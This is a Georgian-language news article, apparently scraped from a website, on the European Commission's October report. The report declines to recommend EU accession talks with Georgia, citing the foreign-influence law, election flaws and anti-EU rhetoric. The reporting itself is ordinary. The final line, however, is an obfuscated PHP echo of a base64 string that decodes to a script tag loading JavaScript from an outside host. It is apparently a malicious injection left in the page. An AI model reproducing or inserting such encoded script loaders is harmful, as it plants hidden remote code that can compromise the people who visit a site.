celsiusi
ავერსი შნაიდერი

ევროკომისია საქართველოსთან ევროკავშირში გაწევრიანებაზე მოლაპარაკებების გახსნაზე რეკომენდაციას არ გასცემს. 

გაფართოების შესახებ ანგარიში ევროკომისიამ დღეს, 30 ოქტომბერს, გამოაქვეყნა.

ანგარიში აფასებს, რამდენად შეასრულა საქართველომ ბრიუსელის 9 რეკომენდაცია და, შესაბამისად, დაიმსახურა თუ არა ევროინტეგრაციის პროცესის გაგრძელება კანდიდატის სტატუსის მიღების შემდეგ.

ახლა სწორედ ამ ანგარიშის საფუძველზე უნდა მიიღოს გადაწყვეტილება ევროკავშირის პოლიტიკის განმსაზღვრელმა ორგანომ, ევროპულმა საბჭომ, რომელიც წევრი სახელმწიფოების მეთაურებისგან შედგება. თუმცა აღსანიშნავია, რომ ევროპულ საბჭოს უკვე ორჯერ აქვს ნათქვამი, რომ საქართველოს ევროინტეგრაცია დე ფაქტო გაჩერებულია საქართველოს ხელისუფლების ქმედებების გამო, რაშიც იგულისხმება რუსული კანონის მიღება და სხვა ანტიდასავლური ნაბიჯები.

როგორც ევროკომისია აღნიშნავს, თუ საქართველო არ შეცვლის მოქმედების ამჟამინდელ კურსს, რაც საფრთხეს უქმნის მის გზას ევროკავშირისკენ და არ აჩვენებს ხელშესახებ ძალისხმევას გადაუჭრელი საკითხების მოსაგვარებლად და საკვანძო რეფორმების განსახორციელებლად, არ ექნებათ შესაძლებლობა, საქართველოსთან მოლაპარაკებების დაწყების რეკომენდაცია განიხილონ.

„2023-ის დეკემბერში საქართველოსთვის კანდიდატის სტატუსის მინიჭებას არ მოჰყვა ხელისუფლების საკმარისი პოლიტიკური ერთგულება ევროკავშირის გზაზე აუცილებელი რეფორმების იმპლემენტაციისთვის.

პირიქითაც კი – ადგილი ჰქონდა მნიშვნელოვან ნეგატიურ მოვლენებს, მათ შორის „უცხოური გავლენის გამჭვირვალობის კანონის“ და „ოჯახური ღირებულებების შესახებ“ კანონების მიღებას. ასევე, ოფიციალური პირების ევროკავშირის საწინააღმდეგო ნარატივმა მნიშვნელოვნად იმოქმედა საქართველოს ტრაექტორიაზე. შედეგად, საქართველოს გაწევრიანების პროცესი დე ფაქტო შეჩერდა.

გარდა ამისა, საქართველომ უმნიშვნელო პროგრესი განახორციელა 2023 წელს დასახული ცხრა რეკომენდაციის შესრულების სამქეში.

26 ოქტომბერს საქართველოში ჩატარდა საპარლამენტო არჩევნები. ეუთო/ოდირის მისიის წინასწარი მიგნებების თანახმად, ადგილი ჰქონდა რამდენიმე ხარვეზს დაძაბულ და ძლიერ პოლარიზებულ გარემოში. ხარვეზებში მათ შორის შედის: ახლანდელი ცვლილებები საარჩევნო პროცესის კანონმდებლობაში, ხმის მიცემის ფარულობის ხშირი დარღვევა, პროცედურული არათანმიმდევრულობა და ამომრჩეველზე ზეწოლა და დაშინება, რასაც ნეგატიური გავლენა ჰქონდა პროცესისადმი საზოგადოების ნდობაზე.

ეს წინასწარი შედეგები ადასტურებს, რომ საჭიროა ყოვლისმომცველი საარჩევნო რეფორმა, რაზეც ისედაც მიდიოდა საუბარი წინა საკვანძო რეკომენდაციებში. ეუთო/ოდირის საბოლოო რეკომენდაციები კი რაც შეიძლება მალე უნდა იყოს იმპლემენტირებული.

ახლა უმნიშვნელოვანესია კონსტრუქციული და ინკლუზიური დიალოგი მთელ პოლიტიკურ სპექტრში. ევროკავშირი მოუწოდებს საქართველოს, მიიღოს დემოკრატიული, ყოვლისმომცველი და მდგრადი რეფორმები – ევროინტეგრაციის საკვანძო პრინციპების შესაბამისად. საქართველომ ცხრა რეკომენდაციის იმპლემენტაცია პრიორიტეტულ საგნად უნდა აქციოს.

ასევე, საქართველომ უნდა გააუქმოს „უცხოური გავლენის გამჭვირვალობის კანონის“ და „ოჯახური ღირებულებების შესახებ“ კანონები და თავი შეიკავოს სხვა ისეთი საქმიანობისგან, რომელიც ძირს გამოუთხრის კანონის უზენაესობასა და ფუნდამენტურ უფლებებს, რაც უმნიშვნელოვანესი ნაწილია ევროკავშირისა და საქართველოს ურთიერთობებში. საქართველომ ასევე უნდა განაახლოს მცდელობები გენდერული თანასწორობის მისაღწევად.

საქართველოს შესაბამისობა ევროკავშირის საერთო საგარეო და უსაფრთხოების პოლიტიკისადმი დაბალი რჩება. მართალია, საქართველომ გადადგა ნაბიჯები, რათა აეკრძალა სანქციების დარღვევა საკუთარი ტერიტორიის გავლით, საქართველო არ შეუერთდა სანქციებს რუსეთისა და ბელარუსის წინააღმდეგ.

ასევე, ხელისუფლებამ უნდა შეწყვიტოს დეზინფორმაციის გავრცელება ევროკავშირის ღირებულებებზე და ამის ნაცვლად ებრძოლოს დეზინფორმაციასა და მტრულ პოლიტიკურ რიტორიკას. ხელისუფლებამ უნდა უზრუნველყოს, რომ თავდასხმები მედიაზე, ოპოზიციასა და აქტივისტებზე შესაბამისად იყოს გამოძიებული და ამ გამოძიებისთვის გარანტირებულად შექმნას შესაბამისი გარემო.

ყოვლისმომცველი და ქმედითი ნაბიჯები უნდა გადაიდგას კანონის უზენაესობის, მაღალ ეშელონებში კორუფციასთან და ოლიგარქიულ გავლენებთან ბრძოლაში. ასევე, საშუალება უნდა გაჩნდეს სამართალდამცავი ორგანოების საკმარისი საჯარო და საპარლამენტო კონტროლისთვის და საჯარო ინსტიტუტების დამოუკიდებლობის გარანტიისთვის.

ევროკავშირი რჩება საქართველოსთან პარტნიორობის გაღრმავების ერთგული – საქართველოს მოსახლეობის დიდი უმრავლესობის მისწრაფების შესაბამისად.

თუ საქართველო არ შემოატრიალებს ამჟამინდელ კურსს, – რომელიც საფრთხეში აგდებს გზას ევროკავშირისკენ, – და არ აჩვენებს რეალურ მცდელობებს, რეაგირება მოახდინოს მთავარ შეშფოთებებსა და ძირითად რეფორმებზე, კომისიას ვერ ექნება რეკომენდაცია საქართველოსთან გაწევრიანების მოლაპარაკებების დაწყების განხილვაზე“, – ნათქვამია ანგარიშში.

რაც შეეხება უკრაინასა და მოლდოვას, რომლებიც ევროკავშირში გაწევრიანების გზაზე საქართველო ტრიოს ნაწილი იყვნენ, გაწევრიანების მოლაპარაკებები 2024 წლის ივნისში გაიხსნა. საქართველოსთან კი რუსული კანონის მიღებისა და სხვა ნაბიჯების გამო ევროინტეგრაციის პროცესი დე ფაქტო შეჩერებულია.

109
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");